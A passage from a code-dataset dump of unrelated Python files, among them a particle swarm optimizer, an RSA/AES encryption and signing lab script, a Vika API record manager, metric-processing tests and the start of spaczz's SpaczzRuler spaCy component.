len(self.heap)\n","sub_path":"python/algorithms/graphs/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"422172848","text":"'''\r\nAlex Costanzino\r\nMSc student in Artificial Intelligence\r\n@ Alma Mater Studiorum, University of Bologna\r\nMarch, 2021\r\n'''\r\n\r\nimport random\r\n\r\nclass Particle:\r\n def __init__(self, x0):\r\n self.velocity = list()\r\n \r\n self.position = list()\r\n self.best_position = list()\r\n \r\n # Default values to force the first iteration\r\n self.fitness = -1\r\n self.best_fitness = -1\r\n \r\n ''' Initialize random velocity and the user-defined initial position '''\r\n for i in range(0, swarm_dimension):\r\n self.velocity.append(random.uniform(-1,1))\r\n self.position.append(x0[i])\r\n \r\n def evaluation(self, fitness, penalty):\r\n ''' Compute the value of the fitness function at the current position '''\r\n self.fitness = fitness(self.position, penalty)\r\n \r\n ''' Chech if the current position is better than the previous, if so, update the best position and the best error '''\r\n if (self.fitness < self.best_fitness) or (self.best_fitness == -1):\r\n self.best_position = self.position\r\n self.best_fitness = self.fitness\r\n \r\n def update_velocity(self, swarm_best_position):\r\n ''' Hyperparameters setup: inertia, cognitive term, social term. See: https://www.mdpi.com/2504-4990/1/1/10 '''\r\n omega, phi_c, phi_s = 0.729, 2.025, 2.025\r\n #omega, phi_c, phi_s = 0.5, 1.25, 1.025\r\n \r\n for i in range(0, swarm_dimension):\r\n rand1, rand2 = random.random(), random.random()\r\n \r\n ''' Cognitive velocity is based on the individual behaviour, while the social velocity is based on the swarm behaviour ''' \r\n cognitive_velocity = phi_c * rand1 * (self.best_position[i] - self.position[i])\r\n social_velocity = phi_s * rand2 * (swarm_best_position[i] - self.position[i])\r\n \r\n self.velocity[i] = (omega * self.velocity[i]) + cognitive_velocity + social_velocity\r\n \r\n def update_position(self, bounds):\r\n for i in range(0, swarm_dimension):\r\n self.position[i] = self.position[i] + self.velocity[i]\r\n \r\n ''' If the position it's out of the user-defined boundaries we can push the particle in (it's an improvement of the algorithm) '''\r\n if self.position[i] > bounds[i][1]:\r\n self.position[i] = bounds[i][1]\r\n \r\n if self.position[i] < bounds[i][0]:\r\n self.position[i] = bounds[i][0]\r\n \r\ndef optimize(fitness, penalty, x0, bounds, n_particles, max_iter):\r\n global swarm_dimension\r\n swarm_dimension = len(x0)\r\n \r\n swarm_best_position = list()\r\n swarm_best_fitness = -1\r\n \r\n ''' Initialization of the swarm '''\r\n swarm = list()\r\n for _ in range(0, n_particles):\r\n swarm.append(Particle(x0))\r\n \r\n ''' Optimization loop '''\r\n it = 0\r\n while it < max_iter:\r\n ''' Evaluate the fitness of each particle in the swarm '''\r\n for k in range(0, n_particles):\r\n swarm[k].evaluation(fitness, penalty)\r\n \r\n ''' Check if the current particle it's the best of the swarm, if so, update best position and best fitness of the swarm'''\r\n if (swarm[k].fitness < swarm_best_fitness) or swarm_best_fitness == -1:\r\n swarm_best_position = list(swarm[k].position)\r\n swarm_best_fitness = float(swarm[k].fitness)\r\n \r\n ''' Update positions and velocities of the swarm '''\r\n for k in range(0, n_particles):\r\n swarm[k].update_velocity(swarm_best_position)\r\n swarm[k].update_position(bounds)\r\n \r\n it += 1\r\n \r\n print('Results: the best fitness value is F(x*) = {}, at x* = {}.'.format(swarm_best_fitness, swarm_best_position))\r\n \r\n return swarm_best_position\r\n ","sub_path":"particle_swarm_optimization_var.py","file_name":"particle_swarm_optimization_var.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"239190563","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.Random import get_random_bytes\n# from Crypto.Util.Padding import pad, unpad\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\nimport os.path\nimport argparse\nimport sys\n\nASYM_KEY1 = 'rsa-encryption'\nASYM_KEY2 = 'rsa-signing'\n\nAES_KEY_SIZE_BITS = 256\nRSA_KEY_SIZE_BITS = 2048\n\ndef generate_asym_keys(name):\n # Generate a public/private key pair\n new_key = RSA.generate(RSA_KEY_SIZE_BITS)\n\n # The public/private key pair in PEM format\n private_key = new_key.exportKey('PEM')\n public_key = new_key.publickey().exportKey('PEM')\n\n print('>> Generated RSA private key [%s-private]: \\n\\n%s\\n' % (name, private_key))\n fd = open('keys/%s-private' % name, 'wb')\n fd.write(private_key)\n fd.close()\n\n print('>> Generated RSA public key [%s-public]: \\n\\n%s\\n' % (name, public_key))\n fd = open('keys/%s-public' % name, 'wb')\n fd.write(public_key)\n fd.close()\n\ndef generate_keys(force_generation=False):\n print('>> Generating asymmetric keys')\n\n # asymmetric key pair 1\n print('>> Checking if key pair 1, [rsa-encryption-public] and [rsa-encryption-private], already exists')\n if force_generation or not os.path.exists('keys/%s-public' % ASYM_KEY1) or not os.path.exists('keys/%s-private' % ASYM_KEY1):\n if not force_generation:\n print('>> Key pair 1 does not exist... generating...')\n else:\n print('>> Forcing regeneration of keys...')\n generate_asym_keys(ASYM_KEY1)\n else:\n print('>> Key pair 1 already exists... skipping key generation...')\n\n # asymmetric key pair 2\n print('>> Checking if key pair 1, [rsa-signing-public] and [rsa-signing-private], already exists')\n if force_generation or not os.path.exists('keys/%s-public' % ASYM_KEY2) or not os.path.exists('keys/%s-private' % ASYM_KEY2):\n if not force_generation:\n print('>> Key pair 2 does not exist... generating...')\n else:\n print('>> Forcing regeneration of keys...')\n generate_asym_keys(ASYM_KEY2)\n else:\n print('>> Key pair 2 already exists... skipping key generation...')\n\ndef encrypt_file(data_file_name, rsa_key_file):\n print('>> Encrypting data file [%s]' % data_file_name)\n with open(data_file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('encrypted_data', 'wb') as encrypted_file:\n print('>> Loading [%s]' % rsa_key_file)\n rsa_key = RSA.import_key(rsa_key_fd.read())\n\n aes_session_key = get_random_bytes(AES_KEY_SIZE_BITS // 8)\n # aes_session_key = b'deadbeefdeadbeefdeadbeefdeadbeef'\n print('>> Generated random %d bit key:' % (AES_KEY_SIZE_BITS))\n # print('%s' % aes_session_key)\n print('\\n%s\\n' % aes_session_key.hex())\n\n print('>> Encrypting AES key using [%s]' % rsa_key_file)\n cipher_rsa = PKCS1_OAEP.new(rsa_key)\n encrypted_aes_session_key = cipher_rsa.encrypt(aes_session_key)\n\n cipher_aes = AES.new(aes_session_key, AES.MODE_EAX)\n\n print('>> Encrypting [%s] using AES key' % data_file_name)\n ciphertext, tag = cipher_aes.encrypt_and_digest(data.read())\n [ encrypted_file.write(x) for x in (encrypted_aes_session_key, cipher_aes.nonce, tag, ciphertext) ]\n\n print('>> Encrypted file contents [encrypted_data]:')\n # print('%s' % ciphertext)\n print('\\n%s\\n' % ciphertext.hex())\n\ndef decrypt_file(data_file_name, rsa_key_file):\n print('>> Decrypting data file [%s]' % data_file_name)\n with open(data_file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('decrypted_data', 'wb') as decrypted_file:\n print('>> Loading [%s]' % rsa_key_file)\n rsa_key = RSA.import_key(rsa_key_fd.read())\n\n encrypted_aes_session_key, nonce, tag, ciphertext = [ data.read(x) for x in (rsa_key.size_in_bytes(), 16, 16, -1) ]\n\n print('>> Decrypting encrypted AES key using [%s]' % rsa_key_file)\n cipher_rsa = PKCS1_OAEP.new(rsa_key)\n aes_session_key = cipher_rsa.decrypt(encrypted_aes_session_key)\n print('>> Decrypted AES key:')\n # print('%s' % aes_session_key)\n print('\\n%s\\n' % aes_session_key.hex())\n\n print('>> Decrypting [%s] using decrypted AES key' % data_file_name)\n cipher_aes = AES.new(aes_session_key, AES.MODE_EAX, nonce)\n decrypted_data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n\n decrypted_file.write(decrypted_data)\n print('>> Decrypted file contents [decrypted_data]: \\n\\n%s\\n' % repr(decrypted_data.decode('utf-8')))\n\ndef sign(file_name, rsa_key_file):\n print('>> Signing file')\n with open(file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('data_signature', 'wb') as signature_file:\n print('>> Signing [%s] using [%s]' % (file_name, rsa_key_file))\n rsa_key = RSA.import_key(rsa_key_fd.read())\n data_hash = SHA256.new(data.read())\n print('>> File hash:')\n # print('%s' % data_hash.digest())\n print('\\n%s\\n' % data_hash.hexdigest())\n signature = pkcs1_15.new(rsa_key).sign(data_hash)\n\n signature_file.write(signature)\n print('>> File signature [data-signature]:')\n # print('%s' % signature)\n print('\\n%s\\n' % signature.hex())\n\ndef verify(file_name, rsa_key_file):\n print('>> Verifying file signature')\n with open(file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('data_signature', 'rb') as signature_file:\n print('>> Verifying [%s] using [%s]' % (file_name, rsa_key_file))\n rsa_key = RSA.import_key(rsa_key_fd.read())\n data_hash = SHA256.new(data.read())\n print('>> File hash:')\n # print('%s' % data_hash.digest())\n print('\\n%s\\n' % data_hash.hexdigest())\n\n try:\n pkcs1_15.new(rsa_key).verify(data_hash, signature_file.read())\n print('>> Signature is valid!')\n except (ValueError, TypeError):\n print('>> Signature is not valid!')\n\narg_parser = argparse.ArgumentParser(description='CSI4139 Lab 1 Part 1')\narg_parser.add_argument('input_file_name', metavar='input', type=str, help='the name of the file to be encrypted')\n\narg_parser.add_argument('-f', '--force_keygen', action='store_true', help='force regeneration of asymmetric keys')\n\nargs = arg_parser.parse_args()\n\ninput_file_name = args.input_file_name\nif not os.path.exists(input_file_name):\n print('>> Input file does not exist... Exiting...')\n exit(1)\n\n\ngenerate_keys(args.force_keygen)\nwith open(input_file_name, 'r') as f:\n print('>> Original file contents of [%s]: \\n\\n%s\\n' % (input_file_name, repr(f.read())))\nsign(input_file_name, 'keys/%s-private' % ASYM_KEY2)\nencrypt_file(input_file_name, 'keys/%s-public' % ASYM_KEY1)\ndecrypt_file('encrypted_data', 'keys/%s-private' % ASYM_KEY1)\nverify('decrypted_data', 'keys/%s-public' % ASYM_KEY2)","sub_path":"lab1/part1/lab1part1.py","file_name":"lab1part1.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542740891","text":"from vika.const import MAX_WRITE_RECORDS_PRE_REQ, MAX_GET_RECORDS_PRE_REQ\nfrom vika.exceptions import RecordDoesNotExist\nfrom vika.datasheet.query_set import QuerySet\nfrom vika.datasheet.record import Record\nfrom vika.types import GETRecordResponse\nfrom vika.utils import query_parse\n\n\nclass RecordManager:\n def __init__(self, dst: 'Datasheet'):\n self._dst = dst\n self._fetched_with = None\n self._fetched_by = None\n\n def bulk_create(self, data):\n \"\"\"\n 批量创建记录,每个请求只能创建 10 条记录 dst.records.bulk_create([{\"标题\": \"hello vika\"}])\n @param data: 记录对象列表 [{ \"fieldKey\": fieldValue }, { \"fieldKey\": fieldValue2 }]\n @return: List[Record]\n \"\"\"\n if len(data) > MAX_WRITE_RECORDS_PRE_REQ:\n raise Exception(f'单个请求创建记录数量不得大于 {MAX_WRITE_RECORDS_PRE_REQ} 条')\n resp = self._dst.create_records(data)\n return [Record(self._dst, record) for record in resp.data.records]\n\n def create(self, data):\n \"\"\"\n 创建一条记录 dst.records.create({\"标题\": \"hello vika\"})\n @param data: dict {\"fieldKey\": fieldValue}\n @return: Record\n \"\"\"\n resp = self._dst.create_records(data)\n if resp.success:\n records = resp.data.records\n return Record(self._dst, records[0])\n raise Exception(resp.message)\n\n def all(self, **kwargs):\n \"\"\"\n 按查询条件过滤记录,参见获取记录 query params https://vika.cn/developers/api-reference#operation/get-records\n @param kwargs:\n - viewId: 'viewId1', 视图ID。默认为维格表中第一个视图。请求会返回视图中经过视图中筛选/排序后的结果,可以搭配使用fields参数过滤不需要的字段数据\n - sort: [{ '列名称或者 ID': 'asc' }] 对指定维格表的记录进行排序。由多个“排序对象”组成的数组。支持顺序:'asc' 和 逆序:'desc'。注:此参数指定的排序条件将会覆盖视图里的排序条件。\n - recordIds: ['recordId1', 'recordId2'],recordIds 数组。如果附带此参数,则返回参数中指定的records数组。 返回值按照传入数组的顺序排序。此时无视筛选、排序。无分页,每次最多查询 1000 条\n - fields: ['标题', '详情', '引用次数'], 指定要返回的字段(默认为字段名, 也可以通过 fieldKey 指定为字段 Id)。如果附带此参数,则返回的记录合集将会被过滤,只有指定的字段会返回。\n - filterByFormula: '{引用次数} > 0', 使用公式作为筛选条件,返回匹配的记录,访问 https://vika.cn/help/tutorial-getting-started-with-formulas/ 了解公式使用方式\n - maxRecords: 5000, 限制返回记录的总数量。如果该值小于表中实际的记录总数,则返回的记录总数会被限制为该值。\n - cellFormat: 'json', 单元格值类型,默认为 'json',指定为 'string' 时所有值都将被自动转换为 string 格式。\n - fieldKey: 'name', 指定 field 的查询和返回的 key。默认使用列名 'name' 。指定为 'id' 时将以 fieldId 作为查询和返回方式(使用 id 可以避免列名的修改导致代码失效问题)\n @return:\n \"\"\"\n _fieldKey = kwargs.get(\"fieldKey\")\n if _fieldKey and _fieldKey != self._dst.field_key:\n # TODO: logger warning\n print(\n f'It seems that you set field_key when init datasheet, all(filedKey=\"{_fieldKey}\") wont work'\n )\n kwargs.update(fieldKey=self._dst.field_key)\n if 'pageSize' in kwargs or 'pageNum' in kwargs:\n resp: GETRecordResponse = self._dst.get_records(**kwargs)\n if resp.success:\n records = resp.data.records\n else:\n print(f\"[{self._dst.id}] fetch data fail\\n {resp.message}\")\n records = []\n else:\n records = self._dst.get_records_all(**kwargs)\n return QuerySet(self._dst, records)\n\n def get(self, *args, **kwargs):\n \"\"\"\n 查询出符合条件的单条记录,适合使用唯一标识的字段做查询\n 1. 指定 record id 查询记录\n dst_books.records.get(\"recxxxxxx\")\n 2. 按条件查询记录\n dst_books.records.get(ISBN=\"9787506341271\")\n @param args:\n @param kwargs:\n @return:\n \"\"\"\n # 按 id 查找\n if args:\n record_id = args[0]\n kwargs = {\"recordIds\": [record_id]}\n elif kwargs:\n query_formula = query_parse(self._dst.field_key_map, **kwargs)\n kwargs = {\"filterByFormula\": query_formula}\n resp: GETRecordResponse = self._dst.get_records(**kwargs)\n if resp.data.records:\n return Record(self._dst, resp.data.records[0])\n raise RecordDoesNotExist()\n\n def filter(self, **kwargs):\n \"\"\"\n 通过查询条件,查询出符合条件的记录集\n songs = dst_songs.records.filter(artist=\"faye wong\")\n for song in songs:\n print(song.title)\n @param kwargs:\n @return: QuerySet\n \"\"\"\n # 直接���过 filter 调用时候,将 filter 查询参数转化为 filterByFormula,使用服务端计算结果\n records = self._query_records(**kwargs)\n return QuerySet(self._dst, records)\n\n def _query_records(self, **kwargs):\n # 将查询条件转化为 filterByFormula, 利用服务端计算查询记录集\n query_formula = query_parse(self._dst.field_key_map, **kwargs)\n kwargs = {\"filterByFormula\": query_formula, \"pageSize\": MAX_GET_RECORDS_PRE_REQ}\n resp: GETRecordResponse = self._dst.get_records(**kwargs)\n if resp.data.pageNum * resp.data.pageSize < resp.data.total:\n return resp.data.records + self._dst.get_records(pageNum=resp.data.pageNum + 1, **kwargs)\n return resp.data.records\n","sub_path":"vika/datasheet/record_manager.py","file_name":"record_manager.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559454097","text":"# O(NlogN) method\nclass Solution:\n def findUnsortedSubarray(self, nums: List[int]) -> int:\n sorted_nums = sorted(nums)\n start = len(nums)\n end = 0\n \n for i in range(len(nums)):\n if nums[i] != sorted_nums[i]:\n start = min(start,i)\n end = max(end,i)\n \n return max(end - start + 1,0)\n","sub_path":"581_Shortest_Unsorted_Continuous_Subarray.py","file_name":"581_Shortest_Unsorted_Continuous_Subarray.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"368599","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\n\nfrom polyaxon.utils.test_utils import BaseTestCase\nfrom traceml.processors.events_processors import metrics_dict_to_list\n\n\n@pytest.mark.processors_mark\nclass TestEventWriter(BaseTestCase):\n def test_gpu_resources_to_metrics(self):\n resources = {\n \"gpu_0_memory_free\": 1000,\n \"gpu_0_memory_used\": 8388608000,\n \"gpu_0_utilization\": 76,\n }\n\n events = metrics_dict_to_list(resources)\n assert len(events) == 3\n assert [e.event.metric for e in events] == [1000, 8388608000, 76]\n\n def test_psutil_resources_to_metrics(self):\n resources = {\n \"cpu_percent_avg\": 1000,\n \"cpu_percent_1\": 0.3,\n \"cpu_percent_2\": 0.5,\n \"getloadavg\": 76,\n \"memory_total\": 12883853312,\n \"memory_used\": 8388608000,\n }\n\n events = metrics_dict_to_list(resources)\n assert len(events) == 6\n assert [e.event.metric for e in events] == [\n 1000,\n 0.3,\n 0.5,\n 76,\n 12883853312,\n 8388608000,\n ]\n","sub_path":"traceml/tests/test_events_processing/test_event_resources.py","file_name":"test_event_resources.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95139628","text":"\"\"\"Module for spaCy v3 compatible SpaczzRuler.\"\"\"\nfrom __future__ import annotations\n\nfrom collections import defaultdict\nfrom itertools import chain\nfrom logging import exception\nfrom pathlib import Path\nfrom typing import (\n Any,\n Callable,\n DefaultDict,\n Dict,\n Iterable,\n List,\n Optional,\n Set,\n Tuple,\n Union,\n)\nimport warnings\n\ntry:\n from spacy.language import Language\n from spacy.pipeline import Pipe\n from spacy.scorer import get_ner_prf\n from spacy.tokens import Doc, Span\n from spacy.training import Example, validate_examples\n from spacy.util import SimpleFrozenDict, SimpleFrozenList\nexcept ImportError: # pragma: no cover\n raise ImportError(\n (\n \"Trying to import spaCy v3 compatible SpaczzRuler from spaCy v2.\",\n \"Please upgrade or use the SpaczzRuler in _spaczzruler-legacy\",\n )\n )\nimport srsly\n\nfrom ..exceptions import PatternTypeWarning\nfrom ..matcher import FuzzyMatcher, RegexMatcher, TokenMatcher\nfrom ..regex import RegexConfig\nfrom ..util import ensure_path, nest_defaultdict, read_from_disk, write_to_disk\n\n\nDEFAULT_ENT_ID_SEP = \"||\"\nsimple_frozen_dict = SimpleFrozenDict()\nsimple_frozen_list = SimpleFrozenList()\n\n\n@Language.factory(\n \"spaczz_ruler\",\n assigns=[\"doc.ents\", \"token.ent_type\", \"token.ent_iob\"],\n default_config={\n \"overwrite_ents\": False,\n \"ent_id_sep\": DEFAULT_ENT_ID_SEP,\n \"fuzzy_defaults\": simple_frozen_dict,\n \"regex_defaults\": simple_frozen_dict,\n \"token_defaults\": simple_frozen_dict,\n },\n default_score_weights={\n \"ents_f\": 1.0,\n \"ents_p\": 0.0,\n \"ents_r\": 0.0,\n \"ents_per_type\": None,\n },\n)\ndef make_spaczz_ruler(\n # typing nlp with Language causes issue with Pydantic in spaCy integration\n nlp: Any,\n name: str,\n overwrite_ents: bool,\n ent_id_sep: str,\n fuzzy_defaults: Dict[str, Any],\n regex_defaults: Dict[str, Any],\n token_defaults: Dict[str, Any],\n) -> SpaczzRuler:\n \"\"\"Factory method for creating a `SpaczzRuler`.\"\"\"\n return SpaczzRuler(\n nlp,\n name,\n overwrite_ents=overwrite_ents,\n ent_id_sep=ent_id_sep,\n fuzzy_defaults=fuzzy_defaults,\n regex_defaults=regex_defaults,\n token_defaults=token_defaults,\n )\n\n\nclass SpaczzRuler(Pipe):\n \"\"\"The `SpaczzRuler` adds fuzzy and multi-token regex matches to spaCy `Doc.ents`.\n\n It can be combined with other spaCy NER components like the statistical\n `EntityRecognizer` and/or the `EntityRuler` to boost accuracy.\n After initialization, the component is typically added to the pipeline\n using `nlp.add_pipe`.\n\n Attributes:\n nlp: The shared nlp object to pass the vocab to the matchers\n (not currently used by spaczz matchers) and process fuzzy patterns.\n fuzzy_patterns:\n Patterns added to the fuzzy matcher.\n regex_patterns:\n Patterns added to the regex matcher.\n token_patterns:\n Patterns added to the token matcher\n fuzzy_matcher: The `FuzzyMatcher` instance\n the spaczz ruler will use for fuzzy phrase matching.\n regex_matcher: The `RegexMatcher` instance\n the spaczz ruler will use for regex phrase matching.\n token_matcher: The `TokenMatcher` instance\n the spaczz ruler will use for token matching.\n defaults: Default matching settings for their respective matchers.\n \"\"\"\n\n name = \"spaczz_ruler\"\n\n def __init__(\n self: SpaczzRuler,\n nlp: Language,\n name: str = \"spaczz_ruler\",\n *,\n overwrite_ents: bool = False,\n ent_id_sep: str = DEFAULT_ENT_ID_SEP,\n fuzzy_defaults: Dict[str, Any] = simple_frozen_dict,\n regex_defaults: Dict[str, Any] = simple_frozen_dict,\n token_defaults: Dict[str, Any] = simple_frozen_dict,\n regex_config: Union[str, RegexConfig] = \"default\",\n patterns: Optional[Iterable[Dict[str, Any]]] = None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Initialize the spaczz ruler.\n\n If `patterns` is supplied here, it needs to be an iterable of spaczz patterns:\n dictionaries with `\"label\"`, `\"pattern\"`, and `\"type\"` keys.\n If the patterns are fuzzy or regex phrase patterns\n they can include the optional `\"kwargs\"` keys.\n\n For example, a fuzzy phrase pattern:\n `{'label': 'ORG', 'pattern': 'Apple',\n 'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`\n\n Or, a token pattern:\n `{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`\n\n Prior to spaczz v0.5, optional parameters had to be prepended with \"spaczz_\"\n to prevent potential conflicts with other spaCy components.\n As of spaCy v3 this is no longer an issue so prepending optional parameters\n with \"spaczz_\" is no longer necessary.\n\n\n Args:\n nlp: The shared `Language` object to pass the vocab to the matchers\n and process fuzzy patterns.\n name: Instance name of the current pipeline component. Typically\n passed in automatically from the factory when the component is\n added. Used to disable the current entity ruler while creating\n phrase patterns with the nlp object.\n overwrite_ents: If existing entities are present, e.g. entities\n added by the model, overwrite them by matches if necessary.\n Default is `False`.\n ent_id_sep: Separator used internally for entity IDs.\n fuzzy_defaults: Modified default parameters to use with the `FuzzyMatcher`.\n Default is `None`.\n regex_defaults: Modified default parameters to use with the `RegexMatcher`.\n Default is `None`.\n token_defaults: Modified default parameters to use with the `TokenMatcher`.\n Default is `None`.\n regex_config: Should largely be ignored as an artifact of an old spaczz\n design pattern. Will likely be updated in the future.\n Default is `\"default\"`.\n patterns: Optional patterns to load in. Default is `None`.\n kwargs: For backwards compatibility with \"spaczz_\" prepended parameters.\n\n Raises:\n TypeError: If matcher defaults passed are not dictionaries.\n \"\"\"\n self.nlp = nlp\n self.name = name\n self.overwrite = kwargs.get(\"spaczz_overwrite_ents\", overwrite_ents)\n self.fuzzy_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(\n list, 2\n )\n self.regex_patterns: DefaultDict[str, DefaultDict[str, Any]] = nest_defaultdict(\n list, 2\n )\n self.token_patterns: DefaultDict[str, List[List[Dict[str, Any]]]] = defaultdict(\n list\n )\n self.ent_id_sep = kwargs.get(\"spaczz_ent_id_sep\", ent_id_sep)\n self._ent_ids: DefaultDict[Any, Any] = defaultdict(dict)\n self.defaults = {}\n default_names = (\n \"fuzzy_defaults\",\n \"regex_defaults\",\n \"token_defaults\",\n )\n fuzzy_defaults = kwargs.get(\"spaczz_fuzzy_defaults\", fuzzy_defaults)\n regex_defaults = kwargs.get(\"spaczz_regex_defaults\", regex_defaults)\n token_defaults = kwargs.get(\"spaczz_token_defaults\", token_defaults)\n for default, name in zip(\n (fuzzy_defaults, regex_defaults, token_defaults), default_names\n ):\n if isinstance(default, dict):\n self.defaults[name] = default\n else:\n raise TypeError(\n (\n \"Defaults must be a dictionary of keyword arguments,\",\n f\"not {type(default)}.\",\n )\n )\n self.fuzzy_matcher = FuzzyMatcher(nlp.vocab, **self.defaults[\"fuzzy_defaults\"])\n self.regex_matcher = RegexMatcher(\n nlp.vocab, regex_config, **self.defaults[\"regex_defaults\"]\n )\n self.token_matcher = TokenMatcher(nlp.vocab, **self.defaults[\"token_defaults\"])\n patterns = kwargs.get(\"spaczz_patterns\", patterns)\n if patterns is not None:\n self.add_patterns(patterns)\n\n def __call__(self: SpaczzRuler, doc: Doc) -> Doc:\n \"\"\"Find matches in document and add them as entities.\n\n Args:\n doc: The Doc object in the pipeline.\n\n Returns:\n The Doc with added entities, if available.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> doc = nlp.make_doc(\"My name is Anderson, Grunt\")\n >>> ruler.add_patterns([{\"label\": \"NAME\", \"pattern\": \"Grant Andersen\",\n \"type\": \"fuzzy\", \"kwargs\": {\"fuzzy_func\": \"token_sort\"}}])\n >>> doc = ruler(doc)\n >>> \"Anderson, Grunt\" in [ent.text for ent in doc.ents]\n True\n \"\"\"\n error_handler = self.get_error_handler()\n try:\n matches, lookup = self.match(doc)\n self.set_annotations(doc, matches, lookup)\n return doc\n except exception as e: # type: ignore\n error_handler(self.name, self, [doc], e)\n\n def __contains__(self: SpaczzRuler, label: str) -> bool:\n \"\"\"Whether a label is present in the patterns.\"\"\"\n return (\n label in self.fuzzy_patterns\n or label in self.regex_patterns\n or label in self.token_patterns\n )\n\n def __len__(self: SpaczzRuler) -> int:\n \"\"\"The number of all patterns added to the ruler.\"\"\"\n n_fuzzy_patterns = sum(len(p[\"patterns\"]) for p in self.fuzzy_patterns.values())\n n_regex_patterns = sum(len(p[\"patterns\"]) for p in self.regex_patterns.values())\n n_token_patterns = sum(len(p) for p in self.token_patterns.values())\n return n_fuzzy_patterns + n_regex_patterns + n_token_patterns\n\n @property\n def ent_ids(self: SpaczzRuler) -> Tuple[Optional[str], ...]:\n \"\"\"All entity ids present in the match patterns id properties.\n\n Returns:\n The unique string entity ids as a tuple.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\", \"id\": \"BEAT\"}])\n >>> ruler.ent_ids\n ('BEAT',)\n \"\"\"\n keys = set(self.fuzzy_patterns.keys())\n keys.update(self.regex_patterns.keys())\n keys.update(self.token_patterns.keys())\n all_ent_ids = set()\n\n for k in keys:\n if self.ent_id_sep in k:\n _, ent_id = self._split_label(k)\n all_ent_ids.add(ent_id)\n all_ent_ids_tuple = tuple(all_ent_ids)\n return all_ent_ids_tuple\n\n @property\n def labels(self: SpaczzRuler) -> Tuple[str, ...]:\n \"\"\"All labels present in the ruler.\n\n Returns:\n The unique string labels as a tuple.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> ruler.labels\n ('AUTHOR',)\n \"\"\"\n keys = set(self.fuzzy_patterns.keys())\n keys.update(self.regex_patterns.keys())\n keys.update(self.token_patterns.keys())\n all_labels = set()\n for k in keys:\n if self.ent_id_sep in k:\n label, _ = self._split_label(k)\n all_labels.add(label)\n else:\n all_labels.add(k)\n return tuple(all_labels)\n\n @property\n def patterns(self: SpaczzRuler) -> List[Dict[str, Any]]:\n \"\"\"Get all patterns and kwargs that were added to the ruler.\n\n Returns:\n The original patterns and kwargs, one dictionary for each combination.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"STREET\", \"pattern\": \"street_addresses\",\n \"type\": \"regex\", \"kwargs\": {\"predef\": True}}])\n >>> ruler.patterns == [\n {\n \"label\": \"STREET\",\n \"pattern\": \"street_addresses\",\n \"type\": \"regex\",\n \"kwargs\": {\"predef\": True},\n },\n ]\n True\n \"\"\"\n all_patterns = []\n for label, fuzzy_patterns in self.fuzzy_patterns.items():\n for fuzzy_pattern, fuzzy_kwargs in zip(\n fuzzy_patterns[\"patterns\"], fuzzy_patterns[\"kwargs\"]\n ):\n ent_label, ent_id = self._split_label(label)\n p = {\"label\": ent_label, \"pattern\": fuzzy_pattern.text, \"type\": \"fuzzy\"}\n if fuzzy_kwargs:\n p[\"kwargs\"] = fuzzy_kwargs\n if ent_id:\n p[\"id\"] = ent_id\n all_patterns.append(p)\n for label, regex_patterns in self.regex_patterns.items():\n for regex_pattern, regex_kwargs in zip(\n regex_patterns[\"patterns\"], regex_patterns[\"kwargs\"]\n ):\n ent_label, ent_id = self._split_label(label)\n p = {\"label\": ent_label, \"pattern\": regex_pattern, \"type\": \"regex\"}\n if regex_kwargs:\n p[\"kwargs\"] = regex_kwargs\n if ent_id:\n p[\"id\"] = ent_id\n all_patterns.append(p)\n for label, token_patterns in self.token_patterns.items():\n for token_pattern in token_patterns:\n ent_label, ent_id = self._split_label(label)\n p = {\"label\": ent_label, \"pattern\": token_pattern, \"type\": 